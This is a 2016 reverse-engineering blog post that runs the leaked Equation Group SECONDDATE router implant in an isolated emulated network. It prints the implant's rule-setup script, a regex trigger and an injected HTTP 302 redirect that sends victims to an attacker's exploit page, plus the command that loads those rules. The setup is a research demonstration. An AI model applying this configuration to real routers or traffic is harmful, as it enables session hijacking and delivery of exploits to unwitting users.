# SECONDDATE in action **laanwj.github.io/2016/09/23/seconddate-adventures.html** ## Laanwj's blog Randomness [Blog](https://laanwj.github.io/) [About](https://laanwj.github.io/about) [Here I’ve taken the environment from the BLATSTING Command-and-Control protocol article](https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html) and extended it, so that the emulator works as a router between an internal network with our victim and an external network, a mock version of the internet with just our attacker and one web server: ----- ``` SimInternet, level 2 ╔════════════════════════════╗ ║ BLATSTING emulator ║ ╔════════════════╗ ║ ╔════════════════════════╗ ║ ╔════════════════╗ emulated ║ Victim host ║ ║ ║ Emulated modules ║ ║ ║ Attacker host ║ serial ║ ║ ║ ║ ┌─────────┐ ┌────────┐ ║ ║ ║ ┌─────┐┌─────┐ ║ (control) ║ ┌─────────┐ ║ ║ ║ │ second ◀┄▶ hash │ ║ ║ ║ │httpd││SD LP│◀━━━━━━━━ ║ │ Browser │ ║ ║ ║ │ date │ └────────┘ ║ ║ ║ └─────┘└─────┘ ║ ║ └─────────┘ ║ ║ ║ │ │ ┌────────┐ ║ ║ ║ ↕ ║ ║ ↕ ║ ║ ║ │ ◀┄▶ crypto │ ║ ║ ║ Linux nw. stck ║ ║ Linux nw. stck ║ ║ ║ └─────────┘ └────────┘ ║ ║ ╚══════▲═════════╝ ╚══════▲═════════╝ ║ ╚════▲════▲══════════════╝ ║ ┃ ╔══════════════════╗ ``` ┃ ║ ┌────▼──┐ ┆ ║ ┣━━━▶ Web server ``` ACME ║ ``` ┃ ║ │ [stub]│ ┆ ║ "outside" ┃ ║ Int. Widgits ``` Ltd ║ ``` ┃ "inside" ║ │ core │┌▼───────┐ Emu.nw.║ eth1 ┃ ``` ╚══════════════════╝ ``` ┃ eth2 ║ └───────┘│ [stub] ◀┄┄┄┄┄┄┄┄▶◀━━━━━━━━━━┛ ┗━━━━━━━━━━━━━▶◀┄┄┄┄┄┄┄┄┄┄▶ network│ Stack ║ Eth-over-UDP ``` ║ └────────┘ ║ ╚════════════════════════════╝ ``` This will allow using SECONDDATE as it was intended to be used, to redirect website visitors (but only on the isolated virtual network). The attacker runs a web server to redirect the victim to, which serves exploit payloads (a FOXACID server, in Equation Group jargon). [Showterm session of the experiment described here.](https://showterm.io/252abdc707d56d893210a) ### Setup: Attacker We’ll (as the attacker) set up the implant with this LP script: ``` disable 1 rule 1 --protocol 6 --dstport 80 --nocheckhttp --checkregex --inject --injectfile injectfile_tcp --regexfile regex_tcp enable 1 ``` _tcptest.seconddate: configuration script for setting up SECONDDATE._ ----- ``` rule [rulenum] [opts ...] Sets options for a rule. where opts is one or more of the following options (defaults are shown in parentheses): [--srcaddr addr(0)] [--srcmask mask(0)] [--dstaddr addr(0)] [--dstmask mask(0)] [--protocol port(6/TCP)] [--srcport port(0)] [-dstport port(0)] [--mininterval(60)] [--maxinjections(5)] [-injectwindow(0)] [--checkhttp (default) | --nocheckhttp] [--checkregex (default) | --nocheckregex] [--inject (default) | --noinject [--tcpflag (FIN ACK PSH) URG | ACK | PSH | RST | SYN | FIN ] [--regexfile ] [--injectfile ``` _SD rule definitions, from SecondDateLp_ `help .` The script does the following: ``` disable 1 : Disable any previous rule 1 (this allows for quick reloading, as live rules ``` cannot be re-configured). ``` rule 1 ... : Set up rule 1. ``` `--protocol 6 : Match IP protocol 6,` [which happens to be TCP. Only TCP or](https://en.wikipedia.org/wiki/List_of_IP_protocol_numbers) UDP allowed here. ``` --dstport 80 : Destination port 80, HTTP. --nocheckhttp : Don’t use the built-in regexp for HTTP, that’s no fun. Define ``` our own. ``` --checkregex : Check for regex defined in --regexfile below. --inject : Do packet injections. --injectfile injectfile_tcp : Set data to inject on injection. --regexfile regex_tcp : Set regexp to match. enable 1 : Make rule 1 live. ``` It is possible to fine-tune various parameters such as the maximum number of injections, the time within which this has to happen, the time between injections and so on and so on, but the defaults work fine for sake of this demo. ``` ^GET / .* regex_tcp : The regular expression to match on TCP packets. This looks for HTTP GET ``` _[requests to the root, any version. This can be any valid PCRE regular expression.](https://www.debuggex.com/cheatsheet/regex/pcre)_ ``` HTTP/1.1 302 Found Location: http://192.168.1.1/exploit.html grazing buzzards ``` ----- ``` injectfile_tcp : This will be injected into the TCP session. A basic HTTP temporary ``` _redirect to the evil web server._ `grazing buzzards is just a 16-byte string that I use for` _finding the packet in captures._ Then subsequently load it into the implant by invoking the LP command from the shell and piping in the script: ``` $ ./SecondDate-3.1.1.0.SecondDateLp 192.168.1.2 < tcptest.seconddate ``` _Loading the rules, from LP-side serial console._ ### Setup: Victim The victim is simply using a PC running a browser and is trying to visit a website over HTTP. [Luckily with HSTS preloading the latter is happening less and less in practice. For the sake](https://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security) of being able to record the terminal session they are using the venerable browser `lynx, but` this will work with any browser. ### The attack The victim, from IPv4 address `192.168.2.1, is trying to visit the legitimate web server of` ACME Internet Widgits Ltd. at `192.168.1.100, through their router (Internet IP` ``` 192.168.1.2 ). They will be redirected to the attacker’s host, 192.168.1.1, which hosts ``` an exploit page. To recap: ``` ╔══════════╗ ╔════════════════╗ ║ Attacker ║ ║ Victim host ║ ╚════▲═════╝ ║ ║ ╔═════════════╗ ┃ 192.168.1.1 ║ ┌─────────┐ ║ 192.168.2.1 ║ Compromised ║ ┃ ║ │ Browser │ ◀━━━━━━━━━━━━━━━━━━▶ Router ``` - ━━━━━━━━━━━━┫ ``` ║ └─────────┘ ║ 192.168.2.2 ╚═════════════╝ 192.168.1.2 ┃ ║ ║ ┃ 192.168.1.100 ║ ║ ╔════════════▼═════╗ ╚════════════════╝ ║ Web server ACME ║ ║ Int. Widgits Ltd ║ ╚══════════════════╝ ``` What happens: Victim opens `http://192.168.1.100/ in their browser, which opens a connection to` the web server of ACME Int. Widgits Ltd. ----- _The website of ACME Internet Widgits Ltd., which has a world-wide monopoly on delivering_ _Schrödinger’s boxes by drone. Cat not included._ SD, running on the compromised router, triggers on the first content packet of this connection, eats it, and instead injects a packet to redirect to the attacker’s server, then immediately closes the connection. It resets the connection to the original web server with a TCP RST packet. ----- _Injected packet as seen from the inside network. The RSTs going to both the webserver and_ _client to immediately end the connection afterward are also visible. The full captures can be_ _downloaded below._ Victim is redirected to `http://192.168.1.100/exploit.html, and will load` whatever is on that page. ----- _The ultimate lazy exploit, just for illustration. Not only does the victim have to adjust their_ _CPU’s instruction pointer manually, they’d have to first finish writing the shellcode. The_ _Equation Group has better ones available. The target link would in practice point to a_ _browser exploit (usually aimed at a plugin such as Flash), or a backdoored installer when_ _intercepting a download._ Note that when the victim immediately loads the site again they won’t get redirected again. The `mininterval serves as a cool-down period.` Packet captures: [seconddate_int.cap internal network](https://laanwj.github.io/assets/2016/09/23/seconddate-adventures/seconddate_int.cap) [seconddate_ext.cap external network (includes C&C traffic)](https://laanwj.github.io/assets/2016/09/23/seconddate-adventures/seconddate_ext.cap) Written on September 23, 2016 Tags: [eqgrp](https://laanwj.github.io/tags/#eqgrp) [malware](https://laanwj.github.io/tags/#malware) [Filed under Reverse-engineering](https://laanwj.github.io/categories/#reverse-engineering) -----